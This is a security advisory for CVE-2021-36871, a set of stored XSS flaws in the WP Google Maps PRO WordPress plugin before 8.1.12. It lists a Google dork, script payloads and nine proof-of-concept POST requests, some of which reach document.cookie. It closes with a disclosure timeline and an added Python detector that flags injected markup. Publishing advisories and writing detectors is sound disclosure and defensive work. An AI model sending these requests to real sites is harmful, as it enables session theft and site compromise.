WP Google Maps PRO Add-on Plugin < 8.1.12 - Authenticated Persistent XSS

2021.09.20
Visse (RU)
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

[+] :: VULNERABILITY: WP Google Maps PRO Add-on Plugin < 8.1.12 - Authenticated Persistent XSS
[+] :: GOOGLE DORK: inurl:/wp-content/plugins/wp-google-maps-pro/
[+] :: DATE: 2021-06-11
[+] :: SECURITY RESEARCHER: Visse [ https://visse.ru ]
[+] :: VENDOR: WP Google Maps [ https://www.wpgmaps.com ]
[+] :: SOFTWARE VERSION: < 8.1.12
[+] :: SOFTWARE LINK: https://www.wpgmaps.com/purchase-professional-version/
[+] :: CVSS: 3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N
[+] :: CWE: CWE-79
[+] :: CVE: CVE-2021-36871

[i] == [ Info: ]

An Authenticated Persistent XSS vulnerability was discovered in the WP Google Maps PRO Add-on Plugin through v8.1.12 for WordPress.

Vulnerable parameter(s): &dataset_name, &title, &description, &link, &names[], &icons[], &attributes[] (x2), &wpgmaps_marker_category_name.

[?] == [ Code: ]

-

[$] == [ Impact: ]

Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.

[%] == [ Payloads: ]

<script>alert(origin)</script>
<script>alert(document.domain)</script>

[!] == [ PoC #1 | Authenticated Persistent XSS | Maps > Heatmaps > &dataset_name: ]

POST /wp-json/wpgmza/v1/heatmaps/ HTTP/2
Host: blackcore.ru
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: f0f10b488b
X-Requested-With: XMLHttpRequest
Content-Length: 532

id=-1&map_id=1&dataset_name=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&gradient=%5B%22rgba(0%2C+0%2C+255%2C+0)%22%2C+%22rgba(0%2C+255%2C+255%2C+1)%22%2C+%22rgba(0%2C+255%2C+0%2C+1)%22%2C+%22rgba(255%2C+255%2C+0%2C+1)%22%2C+%22rgba(255%2C+0%2C+0%2C+1)%22%5D&opacity=0.5&radius=20&dataset=

[!] == [ PoC #2 | Authenticated Persistent XSS | Maps > Markers > &title: ]

POST /wp-json/wpgmza/v1/markers/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e7db87e0a9
X-Requested-With: XMLHttpRequest
Content-Length: 1073

id=-1&map_id=1&title=%3Cscript%3Ealert%28origin%29%3C%2Fscript%3E&address=+450+Dewie+Street+Thunder+Bay%2C+ON+93657+Canada&lat=48.3808951&lng=-89.2476823&link=&icon=&retina=0&category=&anim=0&infoopen=0&approved=1&sticky=0&description=

[!] == [ PoC #3 | Authenticated Persistent XSS | Maps > Markers > &link: ]

POST /wp-json/wpgmza/v1/markers/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e7db87e0a9
X-Requested-With: XMLHttpRequest
Content-Length: 1073

id=-1&map_id=1&title=PoC&address=+450+Dewie+Street+Thunder+Bay%2C+ON+93657+Canada&lat=48.3808951&lng=-89.2476823&link=%3Cscript%3Ealert%28origin%29%3C%2Fscript%3E&icon=&retina=0&category=&anim=0&infoopen=0&approved=1&sticky=0&description=

[!] == [ PoC #4 | Authenticated Persistent XSS | Maps > Markers > &description: ]

POST /wp-json/wpgmza/v1/markers/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e7db87e0a9
X-Requested-With: XMLHttpRequest
Content-Length: 1073

id=-1&map_id=1&title=PoC&address=+450+Dewie+Street+Thunder+Bay%2C+ON+93657+Canada&lat=48.3808951&lng=-89.2476823&link=&icon=&retina=0&category=&anim=0&infoopen=0&approved=1&sticky=0&description=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

[!] == [ PoC #5 | Authenticated Persistent XSS | Custom Fields > Name > &names[]: ]

POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 483

action=wpgmza_save_custom_fields&security=337841e1c8&stack_order%5B%5D=0&ids%5B%5D=2&names%5B%5D=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&icons%5B%5D=&attributes%5B%5D=&widget_types%5B%5D=text&display_in_infowindows%5B2%5D=2&display_in_marker_listings%5B2%5D=2

[!] == [ PoC #6 | Authenticated Persistent XSS | Custom Fields > Icon > &icons[]: ]

POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 483

action=wpgmza_save_custom_fields&security=337841e1c8&stack_order%5B%5D=0&ids%5B%5D=2&names%5B%5D=PoC&icons%5B%5D=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&attributes%5B%5D=&widget_types%5B%5D=text&display_in_infowindows%5B2%5D=2&display_in_marker_listings%5B2%5D=2

[!] == [ PoC #7 | Authenticated Persistent XSS | Custom Fields > Attributes > Name > &attributes[]: ]

POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 483

action=wpgmza_save_custom_fields&security=337841e1c8&stack_order%5B%5D=0&ids%5B%5D=2&names%5B%5D=PoC&icons%5B%5D=&attributes%5B%5D=%7B%22%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%22%3A%22%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%22%7D&widget_types%5B%5D=text&display_in_infowindows%5B2%5D=2&display_in_marker_listings%5B2%5D=2

[!] == [ PoC #8 | Authenticated Persistent XSS | Custom Fields > Attributes > Value > &attributes[]: ]

POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 483

action=wpgmza_save_custom_fields&security=337841e1c8&stack_order%5B%5D=0&ids%5B%5D=2&names%5B%5D=PoC&icons%5B%5D=&attributes%5B%5D=%7B%22%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%22%3A%22%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%22%7D&widget_types%5B%5D=text&display_in_infowindows%5B2%5D=2&display_in_marker_listings%5B2%5D=2

[!] == [ PoC #9 | Authenticated Persistent XSS | Categories > Category Name > &wpgmaps_marker_category_name: ]

POST /wp-admin/admin.php?page=wp-google-maps-menu-categories HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 281

real_post_nonce=337841e1c8&wpgmaps_marker_category_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&upload_default_category_marker=&category_image=&parent_category=0&wpgmaps_marker_category_priority=8&assigned_to_map%5B%5D=ALL&wpgmza_save_marker_category=Save+Category+%C2%BB

[*] == [ Timeline: ]

2021.06.03 - WP Google Maps PRO Add-on Plugin v8.1.11 released
2021.06.11 - Multiple XSS issues discovered
2021.06.12 - Vendor contacted
2021.06.15 - WP Google Maps PRO Add-on Plugin v8.1.12 released

[@] == [ Contacts: ]

Website: visse.ru
LinkedIn: @visse
Medium: @visse
HackerOne: @visse

====================================================================
= Want money for vulnerabilities in the WordPress ecosystem? [Y/n] =
= ---------------------------------------------------------------- =
= [ Yes: ] Join the $ hunt here - https://patchstack.com/red-team/ =
= [ No: ] Hunter, think twice and don't miss the chance to gain $  =
====================================================================
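Defender-side check, added here as an example and not part of the original advisory: a small Python inspector that decodes a form body posted to the plugin endpoints named in the PoCs above and flags markup in the parameters the advisory lists as vulnerable. It also walks the JSON object carried by attributes[], whose keys and values are both user-controlled (PoC #7 and #8), instead of treating it as one opaque string. The endpoint-to-parameter map is taken from the PoCs; the markup heuristic, function names and the sample request are assumptions constructed for this example, not plugin code.

```python
import json
import re
from urllib.parse import parse_qs

# Endpoint -> form parameters the advisory lists as unescaped (paths taken from the PoCs above).
VULNERABLE_PARAMS = {
    "/wp-json/wpgmza/v1/heatmaps/": {"dataset_name"},
    "/wp-json/wpgmza/v1/markers/": {"title", "description", "link"},
    "/wp-admin/admin-post.php": {"names[]", "icons[]", "attributes[]"},
    "/wp-admin/admin.php": {"wpgmaps_marker_category_name"},
}

# Coarse heuristic for HTML/JS in a field that should be plain text: a tag opener,
# a javascript: URL, or an inline event-handler attribute. This is an assumption for
# the example, not the plugin's own filtering; tune it per site.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|javascript:|\bon[a-z]+\s*=", re.I)


def _strings(value):
    """Yield every string nested inside a decoded value.

    attributes[] carries a JSON object whose keys *and* values are user-controlled,
    so JSON text is parsed and walked rather than matched as one opaque string.
    """
    if isinstance(value, str):
        stripped = value.strip()
        if stripped and stripped[0] in "{[":
            try:
                yield from _strings(json.loads(stripped))
                return
            except ValueError:
                pass  # not JSON after all; treat it as a plain string
        yield value
    elif isinstance(value, dict):
        for key, item in value.items():
            yield from _strings(key)
            yield from _strings(item)
    elif isinstance(value, list):
        for item in value:
            yield from _strings(item)


def find_markup(path, body):
    """Return [(param, decoded_value)] for watched params of `path` whose value contains markup."""
    watched = VULNERABLE_PARAMS.get(path.split("?", 1)[0])
    if not watched:
        return []
    hits = []
    for param, values in parse_qs(body, keep_blank_values=True).items():
        if param not in watched:
            continue
        for decoded in _strings(values):
            if MARKUP_RE.search(decoded):
                hits.append((param, decoded))
    return hits


def inspect_request(raw):
    """Parse a raw HTTP request (request line, headers, blank line, body) and check its body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) < 2 or parts[0].upper() != "POST":
        return []
    return find_markup(parts[1], body.strip())


# Constructed sample: PoC #5 from the advisory with cookies and nonce values removed.
SAMPLE_REQUEST = """POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Content-Type: application/x-www-form-urlencoded

action=wpgmza_save_custom_fields&security=REDACTED&stack_order%5B%5D=0&ids%5B%5D=2&names%5B%5D=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&icons%5B%5D=&attributes%5B%5D=&widget_types%5B%5D=text
"""

if __name__ == "__main__":
    for param, value in inspect_request(SAMPLE_REQUEST):
        print(f"markup in {param!r}: {value!r}")
```

Run it over captured POST bodies (a WAF log, a reverse-proxy request dump, or a pentest report) to confirm whether any of the listed fields received markup before the site moved to 8.1.12; a hit on attributes[] is reported per JSON key or value, so the PoC #7/#8 body yields two entries. The real fix remains on the server: the plugin must escape these values on output, and the heuristic above is only a triage aid.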

References:

https://www.youtube.com/channel/UCrquERXvK40ZqvqEwXM7JrA
https://www.linkedin.com/in/visse/
https://patchstack.com/red-team/



Copyright 2021, cxsecurity.com
